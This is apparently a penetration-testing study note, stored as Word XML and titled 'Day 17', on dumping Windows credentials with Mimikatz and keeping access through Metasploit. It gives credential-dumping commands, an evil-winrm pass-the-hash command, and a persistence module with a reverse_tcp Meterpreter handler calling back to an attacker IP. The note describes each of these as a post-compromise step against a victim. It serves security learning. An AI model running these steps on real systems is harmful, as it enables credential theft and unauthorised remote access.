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Day 17 – Dumping Hashes &amp; Maintaining Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Mimikatz – What is it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mimikatz is a post-exploitation tool developed by Benjamin Delpy.</w:t>
        <w:br/>
        <w:t>It is widely used for:</w:t>
        <w:br/>
        <w:t>- Extracting plaintext passwords, hashes, PINs, and Kerberos tickets from memory.</w:t>
        <w:br/>
        <w:t>- Performing pass-the-hash, pass-the-ticket, and Golden Ticket attacks.</w:t>
        <w:br/>
        <w:t>- Gaining persistence inside Windows environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 How Mimikatz Dumps Passwords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Windows stores login information in memory via the LSASS (Local Security Authority Subsystem Service) process.</w:t>
        <w:br/>
        <w:t>Mimikatz interacts with LSASS to extract credentials:</w:t>
        <w:br/>
        <w:t>- Plaintext passwords</w:t>
        <w:br/>
        <w:t>- NTLM hashes</w:t>
        <w:br/>
        <w:t>- Kerberos tickets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Example commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 What is NTLM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NTLM (NT LAN Manager) is a Microsoft authentication protocol.</w:t>
        <w:br/>
        <w:t>It uses a challenge-response mechanism and stores password hashes.</w:t>
        <w:br/>
        <w:t>The NTLM hash is a one-way hash representation of the password.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Attackers can:</w:t>
        <w:br/>
        <w:t>- Crack hashes using tools/sites like hashcat, john the ripper, crackstation.net.</w:t>
        <w:br/>
        <w:t>- Use Pass-the-Hash (PtH) attacks to authenticate using hashes without knowing the plaintext password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Using Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Steps after compromise:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>1. Run Mimikatz on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>2. Check privileges:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>3. Dump credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Relaying Hashes (Evil-WinRM Example)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>If you extract a valid NTLM hash, you can authenticate remotely without the password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>evil-winrm -i &lt;target_ip&gt; -u &lt;username&gt; -H &lt;NTLM_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Persistence After Reboot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Once the machine restarts, your session dies. To maintain persistence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>sessions -i &lt;number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Persistence with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Metasploit provides modules to maintain persistence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/local/persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>set SESSION &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST &lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Maintaining Access After Restart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>1. Multihandler setup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST &lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. After the victim restarts, the persistence payload reconnects back, and you regain a Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Summary Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Compromise target &amp; upload Mimikatz.</w:t>
        <w:br/>
        <w:t>2. Use sekurlsa::logonpasswords to dump credentials.</w:t>
        <w:br/>
        <w:t>3. Crack or relay NTLM hashes (Evil-WinRM).</w:t>
        <w:br/>
        <w:t>4. Background session (sessions -l, sessions -i).</w:t>
        <w:br/>
        <w:t>5. Use persistence module (exploit/windows/local/persistence).</w:t>
        <w:br/>
        <w:t>6. Set up a multi-handler listener.</w:t>
        <w:br/>
        <w:t>7. After restart, regain session automatically.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